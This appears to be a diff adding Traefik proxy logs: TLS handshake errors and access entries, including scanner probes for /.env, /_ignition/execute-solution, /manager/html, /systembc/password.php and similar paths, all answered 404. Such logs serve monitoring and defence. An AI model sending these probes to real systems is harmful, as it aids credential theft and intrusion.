+time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:42650: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:20726: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:29358: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:2051: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:14481: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:50282: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:56615: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:2988: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:48529: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:20220: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:44440: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:32448: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:51093: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:29777: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:11044: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:8981: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:57356: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:32796: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:56113: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.1.1:46658: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.2.0.129:48765: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:58Z" level=debug msg="http: TLS handshake error from 10.0.0.4:57013: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:38384: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:43697: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:60074: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:20412: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:65030: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:60656: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:14260: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:19273: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:52152: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:17089: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:12540: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:5450: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:57559: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:35947: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:55630: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:24657: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:49076: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:42301: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:34883: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:52843: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:21998: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:23977: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:22775: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:20255: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:1078: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:5674: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:24960: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:34787: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:49454: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:12867: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:2098: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:61974: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:31:59Z" level=debug msg="http: TLS handshake error from 10.2.1.1:46270: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:54595: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:53760: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:5722: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:38384: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:35030: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:31343: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:37975: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:25286: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:19627: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:57782: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:13074: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:39016: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:21583: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:32861: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:58516: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:8414: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:12417: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:16797: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:31184: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:42537: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:45201: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:61800: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:13436: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:60321: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:32:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:28122: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:32:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:43882: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:32:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:11788: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:32:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:60896: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:32:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:34003: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:32:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:15682: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.1.1:1098: tls: unsupported SSLv2 handshake received" +time="2024-03-30T21:32:00Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.2.0.129:45980: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:32:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:58653: tls: unsupported SSLv2 handshake received" +time="2024-03-30T21:32:01Z" level=debug msg="http: TLS handshake error from 10.2.1.1:8585: tls: unsupported SSLv2 handshake received" +time="2024-03-30T21:32:01Z" level=debug msg="http: TLS handshake error from 10.2.0.129:45268: tls: unsupported SSLv2 handshake received" +time="2024-03-30T21:32:01Z" level=debug msg="http: TLS handshake error from 10.0.0.4:37608: tls: unsupported SSLv2 handshake received" +time="2024-03-30T21:32:01Z" level=debug msg="http: TLS handshake error from 10.2.1.1:14795: tls: unsupported SSLv2 handshake received" +time="2024-03-30T21:32:01Z" level=debug msg="http: TLS handshake error from 10.2.0.129:61657: tls: unsupported SSLv2 handshake received" +time="2024-03-30T21:32:01Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:01Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T21:32:01Z" level=debug msg="http: TLS handshake error from 10.2.1.1:12243: tls: no cipher suite supported by both client and server" +time="2024-03-30T21:32:01Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +10.0.0.4 - - [30/Mar/2024:21:38:14 +0000] "GET /.env HTTP/1.1" 404 19 "-" "-" 1354 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:21:38:14 +0000] "POST / HTTP/1.1" 404 19 "-" "-" 1355 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:21:40:08 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1356 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:40:08 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1357 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:41:08 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1358 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:21:41:08 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1359 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:42:08 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1360 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:21:42:08 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1361 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:21:48:39 +0000] "GET /.env HTTP/1.1" 404 19 "-" "-" 1362 "-" "-" 0ms +time="2024-03-30T21:48:39Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:21:48:39 +0000] "GET /.env HTTP/1.1" 404 19 "-" "-" 1363 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:21:52:57 +0000] "GET /druid/index.html HTTP/1.1" 404 19 "-" "-" 1364 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:21:58:52 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1365 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:21:58:52 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1366 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:21:59:52 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1367 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:21:59:52 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1368 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:22:02:23 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1369 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:22:02:23 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1370 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:22:03:23 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1371 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:22:03:23 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1372 "api@internal" "-" 0ms +time="2024-03-30T22:14:35Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:22:14:35 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1373 "-" "-" 0ms +time="2024-03-30T22:14:36Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:22:14:36 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1374 "-" "-" 0ms +time="2024-03-30T22:14:44Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:22:14:44 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1375 "-" "-" 0ms +time="2024-03-30T22:14:45Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:22:14:45 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1376 "-" "-" 0ms +time="2024-03-30T22:17:28Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:22:17:28 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1377 "-" "-" 0ms +time="2024-03-30T22:17:28Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:22:17:29 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1378 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:22:18:12 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1379 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:22:18:38 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1380 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:22:22:02 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1381 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:22:22:02 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1382 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:22:23:02 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1383 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:22:23:02 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1384 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:22:24:38 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 1385 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:22:24:39 +0000] "GET /dashboard/ HTTP/1.1" 200 1163 "-" "-" 1386 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:22:27:29 +0000] "GET /hudson HTTP/1.1" 404 19 "-" "-" 1387 "-" "-" 0ms +time="2024-03-30T22:35:24Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:22:35:24 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 19 "-" "-" 1388 "-" "-" 0ms +time="2024-03-30T22:35:54Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T22:35:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:9335: EOF" +10.0.0.4 - - [30/Mar/2024:22:40:57 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1389 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:22:40:57 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1390 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:22:41:57 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1391 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:22:41:57 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1392 "api@internal" "-" 0ms +time="2024-03-30T22:45:20Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:22:45:20 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1393 "-" "-" 0ms +time="2024-03-30T22:45:21Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:22:45:21 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1394 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:22:46:25 +0000] "GET /.env HTTP/1.1" 404 19 "-" "-" 1395 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:22:46:25 +0000] "POST / HTTP/1.1" 404 19 "-" "-" 1396 "-" "-" 0ms +time="2024-03-30T22:48:04Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:22:48:04 +0000] "GET /console/ HTTP/1.1" 404 19 "-" "-" 1397 "-" "-" 0ms +time="2024-03-30T22:50:18Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:22:50:18 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 19 "-" "-" 1398 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:22:51:21 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1399 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:22:51:27 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1400 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:22:56:34 +0000] "GET /manager/html HTTP/1.1" 404 19 "-" "-" 1401 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:22:58:08 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1402 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:22:58:08 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1403 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:22:59:07 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1404 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:22:59:07 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1405 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:23:00:07 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1406 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:23:00:07 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1407 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:03:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1408 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:23:03:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1409 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:04:44 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1410 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:23:04:44 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1411 "api@internal" "-" 0ms +time="2024-03-30T23:08:29Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:23:08:29 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1412 "-" "-" 0ms +time="2024-03-30T23:18:22Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:23:18:22 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1413 "-" "-" 0ms +time="2024-03-30T23:23:00Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:23:23:00 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1414 "-" "-" 0ms +time="2024-03-30T23:23:01Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:23:23:01 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1415 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:23:23:21 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1416 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:23:21 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1417 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:23:39 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1418 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:23:24:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1419 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:24:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1420 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:23:36:46 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1421 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:36:57 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1422 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:23:41:22 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1423 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:23:41:22 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1424 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:23:42:22 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1425 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:23:42:22 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1426 "api@internal" "-" 0ms +time="2024-03-30T23:45:48Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T23:45:49Z" level=debug msg="http: TLS handshake error from 10.2.0.129:7257: read tcp 10.2.0.36:80->10.2.0.129:7257: read: connection reset by peer" +time="2024-03-30T23:47:41Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:23:47:41 +0000] "GET /ab2g HTTP/1.1" 404 19 "-" "-" 1427 "-" "-" 0ms +time="2024-03-30T23:47:42Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:23:47:42 +0000] "GET /ab2h HTTP/1.1" 404 19 "-" "-" 1428 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:23:47:43 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1429 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:23:47:43 +0000] "GET /form.html HTTP/1.1" 404 19 "-" "-" 1430 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:47:44 +0000] "GET /upl.php HTTP/1.1" 404 19 "-" "-" 1431 "-" "-" 0ms +time="2024-03-30T23:47:44Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:23:47:45 +0000] "GET /t4 HTTP/1.1" 404 19 "-" "-" 1432 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:23:47:45 +0000] "GET /geoip/ HTTP/1.1" 404 19 "-" "-" 1433 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:47:46 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 1434 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:23:47:46 +0000] "GET /1.php HTTP/1.1" 404 19 "-" "-" 1435 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:23:47:47 +0000] "GET /bundle.js HTTP/1.1" 404 19 "-" "-" 1436 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:47:47 +0000] "GET /files/ HTTP/1.1" 404 19 "-" "-" 1437 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:23:47:48 +0000] "GET /systembc/password.php HTTP/1.1" 404 19 "-" "-" 1438 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:23:47:48 +0000] "GET /password.php HTTP/1.1" 404 19 "-" "-" 1439 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:47:49 +0000] "GET /info.php HTTP/1.1" 404 19 "-" "-" 1440 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:23:51:49 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1441 "-" "-" 0ms +time="2024-03-31T00:00:06Z" level=debug msg="Skipping Kubernetes event kind *v1.Secret" providerName=kubernetes +time="2024-03-31T00:00:29Z" level=debug msg="Skipping Kubernetes event kind *v1.Secret" providerName=kubernetes +10.2.0.129 - - [31/Mar/2024:00:00:34 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1442 "api@internal" "-" 0ms +10.0.0.4 - - [31/Mar/2024:00:00:34 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1443 "api@internal" "-" 0ms +time="2024-03-31T00:01:23Z" level=debug msg="Skipping Kubernetes event kind *v1.Secret" 